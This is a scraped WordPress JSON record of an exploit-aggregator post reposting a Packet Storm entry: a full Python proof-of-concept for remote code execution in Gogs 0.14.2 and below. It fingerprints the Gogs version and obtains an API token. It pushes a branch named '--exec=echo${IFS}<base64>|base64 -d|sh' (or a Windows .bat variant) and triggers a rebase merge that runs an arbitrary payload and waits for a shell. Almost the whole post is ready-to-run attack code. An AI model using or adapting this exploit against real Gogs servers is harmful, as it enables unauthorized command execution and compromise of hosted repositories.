{"id":62296,"date":"2026-06-12T12:42:30","date_gmt":"2026-06-12T12:42:30","guid":{"rendered":"https:\/\/zero.redgem.net\/?p=62296"},"modified":"2026-06-12T12:42:30","modified_gmt":"2026-06-12T12:42:30","slug":"gogs-0142-argument-injection","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=62296","title":{"rendered":"\ud83d\udcc4 Gogs 0.14.2 Argument Injection_PACKETSTORM:223338"},"content":{"rendered":"

{“lastseen”:”2026-06-12T16:32:18″,”description”:”Proof of concept exploit for an argument injection vulnerability in Gogs versions 0.14.2 and below and versions 0.15.0+dev and below…”,”published”:”2026-06-12T00:00:00″,”modified”:”2026-06-12T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Gogs 0.14.2 Argument Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:223338″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”==================================================================================================================================\\n | # Title : Gogs Git Rebase Argument Injection RCE |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 151.0.3 (64 bits) |\\n | # Vendor : https:\/\/github.com\/gogs\/gogs |\\n ==================================================================================================================================\\n \\n [+] Summary : This Python script is an exploit framework targeting an argument injection vulnerability in Gogs reported as GHSA-qf6p-p7ww-cwr9 in Gogs \\u003c= 0.14.2 and \\u003c= 0.15.0+dev.\\n \\n \\n [+] POC : \\n \\n #!\/usr\/bin\/env python3\\n \\n import os\\n import re\\n import json\\n import tempfile\\n import shutil\\n import subprocess\\n import urllib.parse\\n from typing import Optional, Dict, List, Tuple\\n from html.parser import HTMLParser\\n \\n import requests\\n from requests.exceptions import ConnectionError, Timeout\\n class CSRFExtractor(HTMLParser):\\n \\”\\”\\”Extract CSRF token from HTML response\\”\\”\\”\\n def __init__(self):\\n super().__init__()\\n self.csrf_token = None\\n \\n def handle_starttag(self, tag, attrs):\\n if tag == ‘input’:\\n attrs_dict = dict(attrs)\\n if attrs_dict.get(‘name’) == ‘_csrf’:\\n self.csrf_token = attrs_dict.get(‘value’)\\n class GogsExploit:\\n \\”\\”\\”Gogs Git Rebase Argument Injection RCE Exploit\\”\\”\\”\\n COMMIT_TO_VERSION = {\\n ‘5dcb6c64bdf61e38dbdbb941c1d69789c560d0fb’: ‘0.14.2’,\\n ‘f5c8030c1fd936f3e0e9f774e3c7c39fd102f56f’: ‘0.14.1’,\\n ’36c26c4ccc3ca0339db53eb1fa41e4e86b55163d’: ‘0.14.0’,\\n ‘d958a47a0e9d8747e399c687fdb3ec64a3b1a736’: ‘0.13.4’,\\n ‘5084b4a9b77a506f5e287e82e945e1c6882b827a’: ‘0.13.3’,\\n ‘593c7b6db601c68d16b2fb9a7e1194cb816f5efb’: ‘0.13.2’,\\n ‘0c40e600a275d490481cfeea53705810fbe94d9b’: ‘0.13.1’,\\n ‘8c21874c00b6100d46b662f65baeb40647442f42’: ‘0.13.0’,\\n ‘c9fba3cb30af0789fcf89098dfcb8f2286ee7d3b’: ‘0.12.11’,\\n ‘1ce5171ae170750298c150874e718740dd7ef69f’: ‘0.12.10’,\\n ‘012a1ba19ed2f8f5185be4254f655ba6c4b34db2’: ‘0.12.9’,\\n ‘7f8799c01f264eb7770766621fb68debee414b68’: ‘0.12.8’,\\n ‘d06ba7e527fcc462aecdb660ce001e87d94f024c’: ‘0.12.7’,\\n ‘26395294bdef382b577fd60234e5bb14f4090cc8’: ‘0.12.6’\\n }\\n def __init__(self, target_url: str, username: str, password: str,\\n exploit_method: str = ‘own_repo’, repo_owner: Optional[str] = None,\\n repo_name: Optional[str] = None, enable_rebase: bool = True,\\n payload: str = ”, ssl: bool = False, wfs_delay: int = 30):\\n self.target_url = target_url.rstrip(‘\/’)\\n self.username = username\\n self.password = password\\n self.exploit_method = exploit_method\\n self.repo_owner = repo_owner\\n self.repo_name = repo_name\\n self.enable_rebase = enable_rebase\\n self.payload = payload\\n self.ssl = ssl\\n self.wfs_delay = wfs_delay\\n self.session = requests.Session()\\n self.api_token = None\\n self.need_cleanup = False\\n self.tmpdir = None\\n self.repo_path = None\\n self.malicious_branch = None\\n self.feature_branch = None\\n self.payload_file = None\\n self.bat_file = None\\n self.payload_content = None\\n self.pr_number = None\\n self.default_branch = ‘master’\\n def _normalize_uri(self, *parts) -\\u003e str:\\n \\”\\”\\”Normalize URI by joining parts\\”\\”\\”\\n return ‘\/’.join(str(p).strip(‘\/’) for p in parts if p)\\n def _request(self, method: str, path: str, **kwargs) -\\u003e Optional[requests.Response]:\\n \\”\\”\\”Make HTTP request with proper URI construction\\”\\”\\”\\n url = f\\”{self.target_url}{path}\\” if path.startswith(‘\/’) else f\\”{self.target_url}\/{path}\\”\\n try:\\n return self.session.request(method, url, timeout=30, verify=self.ssl, **kwargs)\\n except (ConnectionError, Timeout) as e:\\n print(f\\”Request failed: {e}\\”)\\n return None\\n def _extract_csrf(self, response: requests.Response) -\\u003e str:\\n \\”\\”\\”Extract CSRF token from HTML response\\”\\”\\”\\n if not response:\\n raise ValueError(\\”No response to extract CSRF from\\”)\\n parser = CSRFExtractor()\\n parser.feed(response.text)\\n if not parser.csrf_token:\\n raise ValueError(\\”CSRF token not found in response\\”)\\n return parser.csrf_token\\n def _basic_auth(self) -\\u003e str:\\n \\”\\”\\”Create Basic authentication header\\”\\”\\”\\n import base64\\n credentials = f\\”{self.username}:{self.password}\\”\\n encoded = base64.b64encode(credentials.encode()).decode()\\n return f\\”Basic {encoded}\\”\\n def _git_available(self) -\\u003e bool:\\n \\”\\”\\”Check if git is installed\\”\\”\\”\\n try:\\n subprocess.run([‘git’, ‘–version’], capture_output=True, check=True)\\n return True\\n except (subprocess.CalledProcessError, FileNotFoundError):\\n return False\\n def _run_git(self, args: List[str], cwd: Optional[str] = None) -\\u003e Tuple[str, bool]:\\n \\”\\”\\”Run git command and return (output, success)\\”\\”\\”\\n env = {‘GIT_TERMINAL_PROMPT’: ‘0’}\\n try:\\n result = subprocess.run(\\n [‘git’] + args, cwd=cwd, env=env,\\n capture_output=True, text=True, check=False\\n )\\n if result.returncode != 0:\\n print(f\\”Git {‘ ‘.join(args)} failed: {result.stderr.strip()}\\”)\\n return result.stderr, False\\n return result.stdout, True\\n except Exception as e:\\n print(f\\”Git error: {e}\\”)\\n return str(e), False\\n def check(self) -\\u003e Tuple[bool, str]:\\n \\”\\”\\”Check if target is vulnerable\\”\\”\\”\\n res = self._request(‘GET’, ‘\/’)\\n if not res:\\n return False, \\”Target did not respond\\”\\n if not re.search(r’\\u003cmeta +name=\\”author\\” +content=\\”Gogs\\”‘, res.text):\\n return False, \\”Target does not appear to be running Gogs\\”\\n version = None\\n hash_match = re.search(r’gogs\\\\.min\\\\.css\\\\?v=([a-f0-9]{40})’, res.text)\\n if hash_match:\\n commit_hash = hash_match.group(1)\\n version = self.COMMIT_TO_VERSION.get(commit_hash)\\n if version:\\n ver_parts = list(map(int, version.split(‘.’)))\\n if ver_parts \\u003c= [0, 14, 2]:\\n return True, f\\”Gogs {version} detected (vulnerable)\\”\\n else:\\n return False, f\\”Gogs {version} detected (not vulnerable)\\”\\n return True, \\”Gogs detected, but could not determine version\\”\\n def _gogs_login(self) -\\u003e None:\\n \\”\\”\\”Login to Gogs web interface\\”\\”\\”\\n res = self._request(‘POST’, ‘\/user\/login’,\\n data={‘user_name’: self.username, ‘password’: self.password},\\n allow_redirects=False)\\n if not res or res.status_code != 302:\\n raise Exception(\\”Login failed – check credentials\\”)\\n \\n def _create_api_token(self) -\\u003e None:\\n \\”\\”\\”Create API token for authenticated requests\\”\\”\\”\\n preflight = self._request(‘GET’, ‘\/api\/v1’)\\n if not preflight:\\n raise Exception(\\”Gogs API not responding\\”)\\n import base64\\n auth_header = self._basic_auth()\\n import random\\n import string\\n token_name = f\\”msf_{”.join(random.choices(string.ascii_lowercase, k=8))}\\”\\n res = self._request(‘POST’, f’\/api\/v1\/users\/{self.username}\/tokens’,\\n headers={‘Authorization’: auth_header},\\n json={‘name’: token_name})\\n if not res or res.status_code != 201:\\n raise Exception(f\\”API token creation failed (HTTP {res.status_code if res else ‘None’})\\”)\\n self.api_token = res.json()[‘sha1’]\\n print(f\\”[*] API token created: {self.api_token[:10]}…\\”)\\n def _api_request(self, method: str, path: str, data: Optional[Dict] = None) -\\u003e Optional[requests.Response]:\\n \\”\\”\\”Make authenticated API request\\”\\”\\”\\n headers = {‘Authorization’: f’token {self.api_token}’}\\n if data:\\n return self._request(method, path, headers=headers, json=data)\\n return self._request(method, path, headers=headers)\\n def _create_repo(self) -\\u003e None:\\n \\”\\”\\”Create a new repository\\”\\”\\”\\n import random\\n import string\\n repo_name = f\\”{”.join(random.choices(string.ascii_lowercase, k=4))}-{”.join(random.choices(string.ascii_lowercase, k=4))}\\”\\n self.repo_name = repo_name\\n self.repo_path = f\\”{self.username}\/{self.repo_name}\\”\\n res = self._api_request(‘POST’, ‘\/api\/v1\/user\/repos’,\\n {‘name’: repo_name, ‘private’: True, ‘default_branch’: ‘master’})\\n if not res or res.status_code != 201:\\n raise Exception(f\\”Repo creation failed: {res.status_code if res else ‘None’}\\”)\\n def _enable_rebase_merge(self) -\\u003e None:\\n \\”\\”\\”Enable rebase merge in repository settings\\”\\”\\”\\n res = self._request(‘POST’, f’\/{self.repo_path}\/settings’,\\n data={‘action’: ‘advanced’, ‘enable_pulls’: ‘on’, ‘pulls_allow_rebase’: ‘on’},\\n allow_redirects=False)\\n if not res or res.status_code not in [200, 302]:\\n raise Exception(\\”Failed to enable rebase merge\\”)\\n def _validate_existing_repo(self) -\\u003e None:\\n \\”\\”\\”Validate existing repository is accessible\\”\\”\\”\\n res = self._api_request(‘GET’, f’\/api\/v1\/repos\/{self.repo_path}’)\\n if not res or res.status_code != 200:\\n raise Exception(f\\”Repository {self.repo_path} not found or not accessible\\”)\\n repo_info = res.json()\\n self.default_branch = repo_info.get(‘default_branch’, ‘master’)\\n print(f\\”[*] Default branch: {self.default_branch}\\”)\\n def _try_enable_rebase(self) -\\u003e None:\\n \\”\\”\\”Try to enable rebase merge in existing repository\\”\\”\\”\\n print(\\”[*] Attempting to enable rebase merge in repository settings\\”)\\n settings_uri = self._normalize_uri(self.repo_path, ‘settings’)\\n res = self._request(‘GET’, f’\/{settings_uri}’)\\n if not res or res.status_code != 200:\\n print(\\”[-] Could not access repository settings (may require repo admin)\\”)\\n return\\n csrf = self._extract_csrf(res)\\n res = self._request(‘POST’, f’\/{settings_uri}’,\\n data={‘_csrf’: csrf, ‘action’: ‘advanced’,\\n ‘enable_pulls’: ‘on’, ‘pulls_allow_rebase’: ‘on’},\\n allow_redirects=False)\\n if res and res.status_code in [200, 302]:\\n print(\\”[+] Rebase merge enabled\\”)\\n else:\\n print(\\”[-] Could not enable rebase merge\\”)\\n def _build_clone_url(self) -\\u003e str:\\n \\”\\”\\”Build git clone URL with credentials\\”\\”\\”\\n user_enc = urllib.parse.quote(self.username, safe=”)\\n pass_enc = urllib.parse.quote(self.password, safe=”)\\n from urllib.parse import urlparse\\n parsed = urlparse(self.target_url)\\n authority = f\\”{parsed.hostname}:{parsed.port}\\” if parsed.port else parsed.hostname\\n scheme = ‘https’ if self.ssl else ‘http’\\n repo_path = self.repo_path.rstrip(‘\/’)\\n return f\\”{scheme}:\/\/{user_enc}:{pass_enc}@{authority}\/{repo_path}.git\\”\\n def _setup_branches_via_git(self) -\\u003e None:\\n \\”\\”\\”Setup branches using local git\\”\\”\\”\\n self.tmpdir = tempfile.mkdtemp(prefix=’msf_gogs_’)\\n workdir = os.path.join(self.tmpdir, ‘work’)\\n clone_url = self._build_clone_url()\\n if self.exploit_method == ‘own_repo’:\\n self._run_git([‘init’, workdir])\\n self._run_git([‘remote’, ‘add’, ‘origin’, clone_url], workdir)\\n else:\\n self._run_git([‘clone’, clone_url, workdir])\\n import random\\n import string\\n self._run_git([‘config’, ‘user.email’, f\\”{”.join(random.choices(string.ascii_lowercase, k=8))}@example.com\\”], workdir)\\n self._run_git([‘config’, ‘user.name’, ”.join(random.choices(string.ascii_lowercase, k=8))], workdir)\\n if self.exploit_method == ‘own_repo’:\\n with open(os.path.join(workdir, ‘README.md’), ‘w’) as f:\\n f.write(f\\”# {self.repo_name}\\\\n\\”)\\n self._run_git([‘add’, ‘.’], workdir)\\n self._run_git([‘commit’, ‘-m’, ‘init’], workdir)\\n self._run_git([‘push’, ‘-u’, ‘origin’, ‘master’], workdir)\\n self.feature_branch = f\\”feature-{”.join(random.choices(string.ascii_lowercase, k=6))}\\”\\n self._run_git([‘checkout’, ‘-b’, self.feature_branch], workdir)\\n with open(os.path.join(workdir, ‘feature.txt’), ‘w’) as f:\\n f.write(”.join(random.choices(string.ascii_lowercase, k=8)))\\n self._run_git([‘add’, ‘.’], workdir)\\n self._run_git([‘commit’, ‘-m’, ‘feature’], workdir)\\n self._run_git([‘push’, ‘origin’, self.feature_branch], workdir)\\n base_branch = ‘master’ if self.exploit_method == ‘own_repo’ else self.default_branch\\n self._run_git([‘checkout’, base_branch], workdir)\\n with open(os.path.join(workdir, ‘diverge.txt’), ‘w’) as f:\\n f.write(”.join(random.choices(string.ascii_lowercase, k=8)))\\n import base64\\n if self.payload:\\n if ‘win’ in self.payload.lower():\\n import random\\n rand_name = ”.join(random.choices(string.ascii_lowercase, k=6))\\n self.payload_content = self.payload\\n self.payload_file = f\\”.{rand_name}\\”\\n self.bat_file = f\\”.{rand_name}.bat\\”\\n self.malicious_branch = f\\”–exec=sh${{IFS}}{self.payload_file}\\”\\n with open(os.path.join(workdir, self.payload_file), ‘w’) as f:\\n f.write(f\\”cmd.exe \/\/c {self.bat_file} \\u003c\/dev\/null \\u003e\/dev\/null 2\\u003e\\u00261 \\u0026\\\\n\\”)\\n with open(os.path.join(workdir, self.bat_file), ‘w’) as f:\\n f.write(self.payload_content + \\”\\\\n\\”)\\n else:\\n wrapped = f\\”({self.payload}) \\u003c\/dev\/null \\u003e\/dev\/null 2\\u003e\\u00261 \\u0026\\”\\n b64 = base64.b64encode(wrapped.encode()).decode()\\n padding = 0\\n while ‘\/\/’ in b64 and padding \\u003c 50:\\n padding += 1\\n b64 = base64.b64encode((‘ ‘ * padding + wrapped).encode()).decode()\\n self.malicious_branch = f\\”–exec=echo${{IFS}}{b64}|base64${{IFS}}-d|sh\\”\\n self._run_git([‘add’, ‘.’], workdir)\\n self._run_git([‘commit’, ‘-m’, ‘diverge’], workdir)\\n self._run_git([‘push’, ‘origin’, f\\”HEAD:refs\/heads\/{self.malicious_branch}\\”], workdir)\\n print(f\\”[+] Malicious branch: {self.malicious_branch}\\”)\\n print(f\\”[+] Feature branch: {self.feature_branch}\\”)\\n def _create_pull_request(self) -\\u003e str:\\n \\”\\”\\”Create pull request for the feature branch\\”\\”\\”\\n encoded_branch = urllib.parse.quote(self.malicious_branch, safe=”)\\n compare_uri = f\\”\/{self.repo_path}\/compare\/{encoded_branch}…{self.feature_branch}\\”\\n import random\\n import string\\n res = self._request(‘POST’, compare_uri,\\n data={‘title’: ”.join(random.choices(string.ascii_lowercase, k=6)),\\n ‘content’: ”, ‘assignee_id’: ‘0’, ‘milestone_id’: ‘0’},\\n allow_redirects=False)\\n if not res:\\n raise Exception(\\”Compare page unreachable\\”)\\n if res.status_code in [302, 303]:\\n location = res.headers.get(‘Location’, ”)\\n pr_num = location.rstrip(‘\/’).split(‘\/’)[-1]\\n if pr_num.isdigit():\\n return pr_num\\n res = self._api_request(‘GET’, f’\/api\/v1\/repos\/{self.repo_path}\/pulls?state=open’)\\n if res and res.status_code == 200:\\n pulls = res.json()\\n if pulls:\\n return str(pulls[-1][‘number’])\\n raise Exception(\\”PR creation failed\\”)\\n def _trigger_rebase_merge(self) -\\u003e None:\\n \\”\\”\\”Trigger the rebase merge to execute payload\\”\\”\\”\\n merge_uri = f\\”\/{self.repo_path}\/pulls\/{self.pr_number}\/merge\\”\\n pr_uri = f\\”\/{self.repo_path}\/pulls\/{self.pr_number}\\”\\n res = self._request(‘GET’, f’\/{pr_uri}’)\\n if not res:\\n raise Exception(\\”Could not load PR page\\”)\\n csrf = self._extract_csrf(res)\\n self._request(‘POST’, f’\/{merge_uri}’,\\n params={‘merge_style’: ‘rebase_before_merging’},\\n data={‘_csrf’: csrf, ‘commit_description’: ”},\\n timeout=self.wfs_delay)\\n def _cleanup_own_repo(self) -\\u003e None:\\n \\”\\”\\”Delete the temporary repository\\”\\”\\”\\n print(f\\”[*] Cleaning up – deleting repository {self.repo_name}\\”)\\n self._api_request(‘DELETE’, f’\/api\/v1\/repos\/{self.repo_path}’)\\n verify = self._api_request(‘GET’, f’\/api\/v1\/repos\/{self.repo_path}’)\\n if verify and verify.status_code == 404:\\n print(f\\”[+] Repository {self.repo_name} deleted\\”)\\n else:\\n print(f\\”[-] Repository may still exist. Delete {self.repo_path} manually.\\”)\\n def _delete_remote_branches(self) -\\u003e None:\\n \\”\\”\\”Delete malicious and feature branches from existing repo\\”\\”\\”\\n if not self.tmpdir:\\n return\\n workdir = os.path.join(self.tmpdir, ‘work’)\\n if not os.path.isdir(workdir):\\n return\\n if self.malicious_branch:\\n print(f\\”[*] Deleting malicious branch from {self.repo_path}\\”)\\n _, success = self._run_git([‘push’, ‘origin’, ‘–delete’, f’refs\/heads\/{self.malicious_branch}’], workdir)\\n if success:\\n print(\\”[+] Malicious branch deleted\\”)\\n else:\\n print(f\\”[-] Could not delete malicious branch. Delete it manually from {self.repo_path}\\”)\\n if self.feature_branch:\\n print(f\\”[*] Deleting feature branch from {self.repo_path}\\”)\\n _, success = self._run_git([‘push’, ‘origin’, ‘–delete’, self.feature_branch], workdir)\\n if success:\\n print(\\”[+] Feature branch deleted\\”)\\n else:\\n print(f\\”[-] Could not delete feature branch from {self.repo_path}\\”)\\n def _close_pull_request(self) -\\u003e None:\\n \\”\\”\\”Close the pull request\\”\\”\\”\\n if not self.pr_number:\\n return\\n pr_page = f\\”\/{self.repo_path}\/pulls\/{self.pr_number}\\”\\n res = self._request(‘GET’, pr_page)\\n if not res:\\n print(f\\”[-] Could not load PR page to close PR #{self.pr_number}\\”)\\n return\\n try:\\n csrf = self._extract_csrf(res)\\n except ValueError:\\n print(f\\”[-] Could not find CSRF token to close PR #{self.pr_number}\\”)\\n return\\n comment_uri = f\\”\/{self.repo_path}\/issues\/{self.pr_number}\/comments\\”\\n res = self._request(‘POST’, comment_uri,\\n data={‘_csrf’: csrf, ‘status’: ‘close’, ‘content’: ”})\\n \\n if res and res.status_code in [200, 302]:\\n print(f\\”[+] PR #{self.pr_number} closed\\”)\\n else:\\n print(f\\”[-] Could not close PR #{self.pr_number}\\”)\\n def _cleanup_existing_repo(self) -\\u003e None:\\n \\”\\”\\”Clean up artifacts from existing repository\\”\\”\\”\\n print(f\\”[*] Cleaning up artifacts from {self.repo_path}\\”)\\n self._delete_remote_branches()\\n self._close_pull_request()\\n def cleanup(self) -\\u003e None:\\n \\”\\”\\”Clean up resources\\”\\”\\”\\n if self.need_cleanup:\\n if self.exploit_method == ‘own_repo’:\\n self._cleanup_own_repo()\\n else:\\n self._cleanup_existing_repo()\\n if self.tmpdir and os.path.isdir(self.tmpdir):\\n shutil.rmtree(self.tmpdir)\\n print(\\”[*] Local temp directory cleaned up\\”)\\n if self.api_token:\\n print(\\”[!] API token persists on the target (Gogs API does not support token deletion)\\”)\\n def exploit(self) -\\u003e bool:\\n \\”\\”\\”Execute the exploit\\”\\”\\”\\n if not self._git_available():\\n print(\\”[-] Local git installation required but not found\\”)\\n return False\\n if self.exploit_method == ‘existing_repo’:\\n if not self.repo_owner or not self.repo_name:\\n print(\\”[-] REPO_OWNER and REPO_NAME required for existing_repo method\\”)\\n return False\\n self.repo_path = f\\”{self.repo_owner}\/{self.repo_name}\\”\\n print(f\\”[*] Executing exploit with payload: {self.payload[:50]}…\\”)\\n print(f\\”[*] Authenticating as \\\\\\”{self.username}\\\\\\”\\”)\\n self._create_api_token()\\n self._gogs_login()\\n print(\\”[+] Authenticated\\”)\\n if self.exploit_method == ‘own_repo’:\\n self._create_repo()\\n self.need_cleanup = True\\n print(f\\”[+] Repository ‘{self.repo_name}’ created\\”)\\n print(\\”[*] Enabling rebase merge in repository settings\\”)\\n self._enable_rebase_merge()\\n print(\\”[+] Rebase merge enabled\\”)\\n else:\\n print(f\\”[*] Using existing repository \\\\\\”{self.repo_path}\\\\\\”\\”)\\n self._validate_existing_repo()\\n self.need_cleanup = True\\n if self.enable_rebase:\\n self._try_enable_rebase()\\n else:\\n print(\\”[*] Assuming rebase merge is already enabled\\”)\\n print(\\”[*] Pushing branches via git\\”)\\n self._setup_branches_via_git()\\n print(\\”[+] Branches pushed\\”)\\n print(\\”[*] Creating pull request\\”)\\n self.pr_number = self._create_pull_request()\\n print(f\\”[+] PR #{self.pr_number} created\\”)\\n print(\\”[*] Triggering rebase merge\\”)\\n self._trigger_rebase_merge()\\n print(\\”[+] Rebase merge triggered, waiting for shell…\\”)\\n return True\\n def main():\\n \\”\\”\\”Example usage\\”\\”\\”\\n import argparse\\n parser = argparse.ArgumentParser(description=’Gogs Git Rebase Argument Injection RCE’)\\n parser.add_argument(‘url’, help=’Target Gogs URL (e.g., http:\/\/localhost:3000)’)\\n parser.add_argument(‘-u’, ‘–username’, required=True, help=’Gogs username’)\\n parser.add_argument(‘-p’, ‘–password’, required=True, help=’Gogs password’)\\n parser.add_argument(‘-m’, ‘–method’, default=’own_repo’, choices=[‘own_repo’, ‘existing_repo’],\\n help=’Exploit method’)\\n parser.add_argument(‘–repo-owner’, help=’Repository owner (for existing_repo)’)\\n parser.add_argument(‘–repo-name’, help=’Repository name (for existing_repo)’)\\n parser.add_argument(‘–payload’, required=True, help=’Command payload to execute’)\\n parser.add_argument(‘–ssl’, action=’store_true’, help=’Use SSL\/TLS’)\\n parser.add_argument(‘–wfs-delay’, type=int, default=30, help=’Wait time for shell’)\\n args = parser.parse_args()\\n exploit = GogsExploit(\\n target_url=args.url,\\n username=args.username,\\n password=args.password,\\n exploit_method=args.method,\\n repo_owner=args.repo_owner,\\n repo_name=args.repo_name,\\n payload=args.payload,\\n ssl=args.ssl,\\n wfs_delay=args.wfs_delay\\n )\\n try:\\n vulnerable, msg = exploit.check()\\n print(f\\”[*] Check result: {msg}\\”)\\n if not vulnerable:\\n print(\\”[-] Target does not appear vulnerable\\”)\\n return\\n success = exploit.exploit()\\n if success:\\n print(\\”[+] Exploit completed successfully\\”)\\n else:\\n print(\\”[-] Exploit failed\\”)\\n except KeyboardInterrupt:\\n print(\\”\\\\n[*] Interrupted by user\\”)\\n except Exception as e:\\n print(f\\”[-] Error: {e}\\”)\\n finally:\\n exploit.cleanup()\\n if __name__ == ‘__main__’:\\n main()\\n \\t\\n Greetings to :==============================================================================\\n jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\\n ============================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/223338″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/223338\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-06-12T16:32:18″,”description”:”Proof of concept exploit for an argument injection vulnerability in Gogs versions 0.14.2 and below and versions 0.15.0+dev and below…”,”published”:”2026-06-12T00:00:00″,”modified”:”2026-06-12T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Gogs 0.14.2 Argument Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:223338″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”==================================================================================================================================\\n |…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-62296","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 Gogs 0.14.2 Argument Injection_PACKETSTORM:223338 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=62296\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Gogs 0.14.2 Argument Injection_PACKETSTORM:223338 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-06-12T16:32:18″,”description”:”Proof of concept exploit for an argument injection vulnerability in Gogs versions 0.14.2 and below and versions 0.15.0+dev and below…”,”published”:”2026-06-12T00:00:00″,”modified”:”2026-06-12T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Gogs 0.14.2 Argument Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:223338″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”==================================================================================================================================n |...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=62296\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-06-12T12:42:30+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"18 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=62296#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=62296\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Gogs 0.14.2 Argument Injection_PACKETSTORM:223338\",\"datePublished\":\"2026-06-12T12:42:30+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=62296\"},\"wordCount\":3504,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"news\",\"NONE\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=62296#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=62296\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=62296\",\"name\":\"\ud83d\udcc4 Gogs 0.14.2 Argument Injection_PACKETSTORM:223338 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-06-12T12:42:30+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=62296#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=62296\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=62296#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Gogs 0.14.2 Argument Injection_PACKETSTORM:223338\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero 